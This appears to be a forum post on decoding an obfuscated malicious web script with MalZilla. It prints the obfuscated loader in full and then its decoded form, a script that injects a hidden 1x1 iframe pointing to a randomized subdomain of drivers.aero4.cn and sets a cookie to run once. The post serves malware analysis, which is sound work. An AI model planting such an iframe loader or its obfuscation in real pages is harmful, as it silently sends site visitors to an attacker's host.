After you let MalZilla decode that script you get this:
<script>if(yX!=1){function Gt(Pl){return Pl}try{var AXa='88v8Vv8Iv8Zv8kv8Mv8Nv8Jv8yv8Gv8hv83v8Yv8Kv8tv8mv8Cv85v8jv8qv8dv8Bv8Sv8sv8Rv8Tv8Wv89v8lv8Lv8cv8iv8Dv8gv8Xv86v8pv87v8Av8xv8rv84v8bv8av8nv8ev8Uv8ov8Ov8wv8zv8Fv8fv8HvV8vVVvVIvVZvVkvVMvVNvVJvVyvVGvVhvV3vVYvVKvVtvVmvVCvV5vVjvVqvVdvVBvVS', fVI=Gt('v'); var DOj=Array(25969^26005,kJM('171'),22080^22267,kJM('170'),29706^29883,4571^4467,23665^23773,kJM('230'),kJM('213'),26221^26303,kJM('190'),6158^6307,17023^17097,kJM('183'),kJM('248'),kJM('145'),kJM('158'),1294^1463,6482^6631,kJM('189'),6799^6783,kJM('241'),kJM('163'),5448^5613,kJM('246'),32698^32539,kJM('229'),kJM('209'),1769^1625,10271^10493,kJM('255'),kJM('188'),kJM('174'),kJM('236'),15549^15433,kJM('247'),28161^28321,kJM('224'),kJM('238'),26220^26335,kJM('150'),kJM('142'),kJM('180'),27394^27627,13100^13239,17404^17235,kJM('156'),kJM('227'),351^467,8512^8703,32450^32305,kJM('232'),kJM('250'),19346^19213,kJM('149'),5786^5649,kJM('249'),20719^20597,kJM('141'),27205^27343,23843^23991,kJM('186'),kJM('164'),1294^1513,kJM('131'),kJM('134'),11816^11997,32299^32393,13530^13371,kJM('133'),3077^3201,kJM('151'),11483^11313,kJM('235'),27176^27333,6220^6307,kJM('242')), pCw; var vOu, hDk; var MdE='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', pLG='';function kJM(tzZ){return parseInt(tzZ)}AXa=AXa.split(fVI);for (pCw=0;pCw<MdE.length;pCw+=2){hDk=MdE.substr(pCw,2);var HW=AXa.length;for(vOu=0;vOu<HW;vOu++) {if(1==0);if(AXa[vOu]==hDk)break;}pLG+=String.fromCharCode(DOj[vOu]^216); }document.write(pLG);}catch(Uy){}}var yX=1</script>
Remove the script tags from the beginning and end. Then remove "if(yX!=1){" and "try{" and also remove "}catch(Uy){}}var yX=1" from the end.
You can then decode it in MalZilla and will be left with:
<script>
function IFrame(){}
IFrame.prototype = {
host : 'drivers.aero4.cn',
path : '/x86/',
cookieName : 'rd4va',
cookieValue : 1,
setCookie : function(name, value)
{
var d= new Date(); d.setTime(new Date().getTime() + 86400000);
document.cookie = name + "=" + escape(value) + "; expires=" + d.toGMTString();
},
install : function()
{
if(!this.alreadyInstalled())
{
var s = "<iframe width=1 height=1 frameBorder=0 src='" + this.getFrameURL() + "'></iframe>";
try { document.write(s) }
catch(e){ document.write("<html><body>" + s + "</body></html>") }
this.setCookie(this.cookieName, this.cookieValue);
}
},
getFrameURL : function()
{
var dlh=document.location.host;
return 'http://' + ((dlh == '' || dlh == 'undefined') ? this.getRandString() : '') + dlh.replace (/[^a-z0-9.-]/,'.').replace (/\.+/,'.') + "." + this.getRandString() + "." + this.host + this.path;
},
alreadyInstalled : function()
{
return !(document.cookie.indexOf(this.cookieName + '=' + this.cookieValue) == -1);
},
getRandString : function()
{
var l=16, c= '0123456789abcdef', o='';
for (var i=0; i < l; i++)
o+=c.substr (Math.floor(Math.random() * c.length), 1, 1);
return o;
}
}
var o = new IFrame();
o.install();
</script>
Topic: decoding scripts in malzilla (Read 8472 times)